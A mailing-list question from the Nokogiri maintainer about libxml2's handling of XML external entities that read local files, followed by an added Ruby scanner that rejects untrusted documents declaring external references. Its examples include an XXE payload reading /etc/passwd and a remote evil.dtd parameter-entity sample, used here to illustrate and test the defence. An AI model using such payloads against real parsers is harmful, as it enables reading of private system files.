[xml] Question about security implications around external entities

Hi,

I'm a maintainer of Nokogiri, which is a libxml2 binding for Ruby. We've had questions on our mailing list around possible XXE attacks related to local files (see https://github.com/sparklemotion/nokogiri/issues/693 and related https://groups.google.com/group/nokogiri-talk/browse_thread/thread/47eaa6931bfa2301).

If I parse a document that references a local file, like this:

    <!DOCTYPE root [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
    <root>
      <e>&ent;</e>
    </root>

There is no obvious way to avoid having libxml2 open `/etc/passwd`. You may be able to avoid replacing the entity by setting the NOENT option; however there is still a possible vulnerability here. I can avoid loading external entity files that are accessed over the network by setting the NONET parse option; there is no equivalent for local file access.

My question is this: what's the official libxml2 policy on this? Should users of libxml2 who are parsing untrusted documents do their parsing in a `chroot` environment to limit file access? Is there some other workaround? Are the maintainers open to a parse option that will turn off local file access? Is there something obvious that I'm missing?

Thanks very much for your attention.

-mike

---
mike dalessio / @flavorjones
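One stop-gap for the situation described above, as an added example that is not part of the original post and not code from libxml2 or Nokogiri: scan the prolog of an untrusted document for external identifiers before the text ever reaches the parser, and refuse to parse it if any are found. The module name `ExternalRefCheck`, its method names and the sample documents are all assumptions made up here; only the `file:///etc/passwd` document comes from the post. The check goes a little beyond the post's single case: it also catches an external DTD subset (`<!DOCTYPE root SYSTEM "...">`), parameter entities, and PUBLIC identifiers, and it separates the local-file references that NONET does not block from the network ones that it does.

```ruby
# Added example for this thread: a pre-parse scan of an untrusted document's
# prolog for external identifiers, run before the text is handed to libxml2.
# This is not libxml2 or Nokogiri code; the module and method names are made
# up here, and the sample documents below are constructed for illustration.
module ExternalRefCheck
  QUOTED  = /"[^"]*"|'[^']*'/
  # SYSTEM "uri"  or  PUBLIC "pubid" "uri"
  EXT_ID  = /(?<kind>SYSTEM|PUBLIC)\s+(?<lit1>#{QUOTED})(?:\s+(?<lit2>#{QUOTED}))?/
  # <!DOCTYPE name [external id] [ internal subset ]>
  DOCTYPE = /<!DOCTYPE\s+(?<name>[^\s\[>]+)(?:\s+#{EXT_ID})?\s*(?:\[(?<subset>.*?)\])?\s*>/m
  # <!ENTITY [%] name SYSTEM|PUBLIC ...>  (general or parameter entity)
  ENTITY  = /<!ENTITY\s+(?<pe>%\s+)?(?<name>\S+)\s+#{EXT_ID}/m

  # Every external reference declared in the prolog, as
  # { kind: :dtd | :entity | :parameter_entity, name: "...", uri: "..." }.
  def self.external_references(xml)
    refs = []
    doc = DOCTYPE.match(xml)
    return refs unless doc
    refs << { kind: :dtd, name: doc[:name], uri: uri_of(doc) } if doc[:kind]
    (doc[:subset] || "").to_enum(:scan, ENTITY).map { Regexp.last_match }.each do |ent|
      kind = ent[:pe] ? :parameter_entity : :entity
      refs << { kind: kind, name: ent[:name], uri: uri_of(ent) }
    end
    refs
  end

  # A bare or relative system identifier is resolved against the document's
  # base, and file: names the filesystem explicitly; both end up as local
  # file access, which NONET does not stop. http:/ftp: are what NONET blocks.
  def self.local_file?(uri)
    uri !~ %r{\A[A-Za-z][A-Za-z0-9+.\-]*:} || uri.start_with?("file:")
  end

  def self.local_file_references(xml)
    external_references(xml).select { |r| local_file?(r[:uri]) }
  end

  # allow_doctype: false is the conservative policy for untrusted input: any
  # DOCTYPE at all is rejected, so an internal subset this regex scanner
  # mis-parses (e.g. a "]>" hidden inside a comment) cannot smuggle a
  # declaration past it.
  def self.safe_to_parse?(xml, allow_doctype: true)
    return false if !allow_doctype && xml =~ /<!DOCTYPE/i
    external_references(xml).empty?
  end

  def self.uri_of(m)
    lit = m[:kind] == "PUBLIC" ? m[:lit2] : m[:lit1]
    lit && lit[1..-2]   # strip the surrounding quotes
  end
  private_class_method :uri_of
end

# Constructed sample documents (not taken from any real system).
XXE_LOCAL = <<~XML
  <!DOCTYPE root [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
  <root><e>&ent;</e></root>
XML
PE_REMOTE = <<~XML
  <!DOCTYPE root [
    <!ENTITY % ext SYSTEM "http://example.com/evil.dtd">
    %ext;
  ]>
  <root/>
XML
EXT_DTD       = %(<!DOCTYPE root SYSTEM "local.dtd"><root/>)
INTERNAL_ONLY = %(<!DOCTYPE root [ <!ENTITY ent "hello"> ]><root><e>&ent;</e></root>)

if __FILE__ == $PROGRAM_NAME
  { "XXE_LOCAL" => XXE_LOCAL, "PE_REMOTE" => PE_REMOTE,
    "EXT_DTD" => EXT_DTD, "INTERNAL_ONLY" => INTERNAL_ONLY }.each do |label, doc|
    puts "#{label}: safe=#{ExternalRefCheck.safe_to_parse?(doc)} " \
         "local_refs=#{ExternalRefCheck.local_file_references(doc).map { |r| r[:uri] }}"
  end
end
```

This is a textual pre-filter, not a parser, so it errs on the side of rejecting: anything it cannot classify (a PUBLIC declaration missing its system literal, a DOCTYPE appearing inside a comment) is treated as external. It does not replace a real parse option that disables local file access; it only keeps a document with a declared external reference from reaching libxml2 at all.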
